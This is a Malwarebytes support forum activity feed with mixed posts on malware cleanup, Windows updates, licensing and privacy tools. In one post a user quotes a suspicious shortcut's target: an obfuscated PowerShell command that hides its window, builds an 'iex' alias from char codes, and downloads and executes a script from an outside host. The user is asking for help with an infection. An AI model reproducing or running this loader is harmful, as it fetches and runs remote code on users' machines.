All Activity

  1. Past hour
  2. I have a shortcut launcher on my desktop; I think it is a virus or trojan. Target properties are as follows: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted -Windo 1 $ag=[string][char[]]@(0x69,0x65,0x58) -replace ' ','';sal s $ag;$nq=((New-Object Net.WebClient)).DownloadString('http://shortbit.xyz/psp');s $nq I saw a previous post indicating it was a trojan. I followed the advice there and did a full scan. How can I tell if the trojan is active?
  3. If you want to manually install the 1903 update you can do it directly from the website https://www.microsoft.com/en-us/software-download/windows10 and click on Update Now. You can also download the Media Creation tool, which will give you the choice to either install it now, or create a bootable media. In your case I would choose option 1 above, this way you can see the progress.
  4. You're quite welcome @Mike43

     I'll go ahead and leave you with some further information to help keep your computer clean going forward.

     Let's get real. If you're not backing up your data and you're still using Google Chrome then you're just not serious about Privacy, Safety, and protecting your data. Malwarebytes is a fantastic program but you still need to back up your data and you still need to block scripts and Ads in your browser. If you're still using Google Chrome I would highly suggest you consider using Firefox instead. For more advanced users you might consider installing NoScript as well (it does have a higher learning curve though)

     Help Secure your browsers
     Please install uBlock Origin for your browsers to better protect your system
       • FireFox, Chrome, Opera, Safari, Microsoft Edge
       • AdBlock for Internet Explorer
       • How to use uBlock Origin to protect your online privacy and security | uBlock Origin tutorial 2018
         This video tutorial above explains how to use uBlock Origin in advanced user mode and all the advanced settings to protect your online privacy and help prevent unwanted sites from changing your browser settings
       • Browser push notifications: a feature asking to be abused
       • HTTPS Everywhere
       • NOTHING TO HIDE documentary

     Review your email and Office choices
       • Quit Gmail for free encrypted email - Tutanota
       • Why ProtonMail Is More Secure Than Gmail
       • LibreOffice - Free and open source office suite

     Use Password Management software
       • Bitwarden
       • KeePass Password Safe

     Encrypted Instant Messenger and Voice Calls
       • Riot
       • Signal
       • Wickr Me

     Follow-up Reading
       • Everything you need to know about cybercrime
       • 10 easy ways to prevent malware infection
       • Keep your data backed up

     Thank you for choosing Malwarebytes as your preferred security protection software and tell your friends and family too. We're here to help. I'll go ahead and close your topic soon, but if you do find you need further assistance please let us know and we can reopen your topic, or you can create a new one.

     Have a great weekend
     Ron
  5. Today
  6. Understood. Please contact our support team at https://support.malwarebytes.com/community/consumer/pages/contact-us to get help. Ron
  7. WOW, that is what we call a fast response. First I want to thank you for the fast, precise, and easy to comprehend explication. 1 more thumbs up for Malwarebytes. I have followed your suggestion and removed the extension, did a new scan with Malwarebytes and everything seems to be alright. Again, thank you for your help.
  8. @jdemoccc There is a one-click MBES -> MBEP migration tool coming soon but it is not yet ready.
  9. After running FRST the results are unchanged -- can't start mbam.exe with normal Windows boot but mbam.exe runs and scans OK if boot to safe mode + networking. With normal Windows boot I tried disabling all protections in my ESET security but no change. Below is the info from Fixlog.txt.
  10. I quite well agree that direct contact would be optimal, and would help avoid any problems in relaying information, and who knows, maybe talking to one of your people would get him off that dang McAfee and also on to MWB... I fear that trying to convince him to make a general post is not going to be met with much success. May I ask by what means I could have him contact your help-desk? Every time I have done so (and there have been more than several) it has been through a link within MWB-
  11. It restarted, should I open its file location and run it again?
  12. @sfrush way too soon to even guess. It ( 3.8.1.2950 ) [ or its successor ] has to be in a test period & then without any show stoppers outstanding. At least 7 to 10 days from now. If it is released, there will be an announcement at the very top of this sub-forum. Also, if your pc is running the Beta, it will automatically get notice of the release & the update.
  13. Okay, please see if Malwarebytes will run now and run the following 3 steps again. Please run the following steps and post back the logs as an attachment when ready.

      STEP 01
      If you're already running Malwarebytes 3 then open Malwarebytes and check for updates. Then click on the Scan tab and select Threat Scan and click on Start Scan button.
      If you don't have Malwarebytes 3 installed yet please download it from here and install it. Once installed then open Malwarebytes and check for updates. Then click on the Scan tab and select Threat Scan and click on Start Scan button.
      Once the scan is completed click on the Export Summary button and save the file as a Text file to your desktop or other location you can find, and attach that log on your next reply.
      If Malwarebytes won't run then please skip to the next step and let me know on your next reply.

      STEP 02
      Please download AdwCleaner by Malwarebytes and save the file to your Desktop.
      Right-click on the program and select Run as Administrator to start the tool.
      Accept the Terms of use.
      Wait until the database is updated.
      Click Scan Now.
      When finished, please click Clean & Repair.
      Your PC should reboot now if any items were found.
      After reboot, a log file will be opened. Copy its content into your next reply.

      RESTART THE COMPUTER Before running Step 3

      STEP 03
      Please download the Farbar Recovery Scan Tool and save it to your desktop.
      Note: You need to run the version compatible with your system. You can check here if you're not sure if your computer is 32-bit or 64-bit
      Double-click to run it. When the tool opens, click Yes to disclaimer.
      Press the Scan button.
      It will make a log (FRST.txt) in the same directory the tool is run. Please attach it to your reply.
      The first time the tool is run, it also makes another log (Addition.txt). If you've run the tool before, you need to place a check mark here.
      Please attach the Additions.txt log to your reply as well.

      Thanks
      Ron
  14. I see the Windows update assistant in my task manager far below and when I press check for update it shows I am up to date, would it be safe to assume it stopped and to restart?
  15. Hello @brucemc777 It really is best if your friend comes to the forum and signs up and starts his own new topic so that one of our Experts can provide direct one-on-one assistance. Going through a middle 3rd party will make fixing the computer nearly impossible. They can also contact our Helpdesk for support if wanted. Thanks Ron
  16. Sorry, stupid question. How do I know if I'm using Remote Desktop? The only computer-to-computer communication I do is between my desktop and my laptop and that is primarily (99%) through my own wireless network at the house. But a ton of my work and my software are in the cloud. Does it sound like I can disable RDP and block the 3389 port? Thank you both for the information.
  17. IMHO we should not have to contact Malwarebytes for this, it should be available in the my account portal where one manages their subscriptions.
  18. You should be able to restart the computer as long as no actual update is running. You can click Start, and type in Check for updates and see.
  19. I downloaded the update assistant and accidentally downsized it instead of pressing the downsize button on screen and don't see it anywhere on my screen or in my task bar, I'm not sure if it's still running but should I leave it be or open its file again if it stopped?
  20. Coming soon to a computer near you... once it's done being tested in the beta process, should not be too long.
  21. Anyone know when the official version for 3.8 will be released?
  22. I had this issue some time back where I had the license key + ID. In the end Support sent me a new lifetime key but one of the newer ones. So keep on them to get that as it is easier.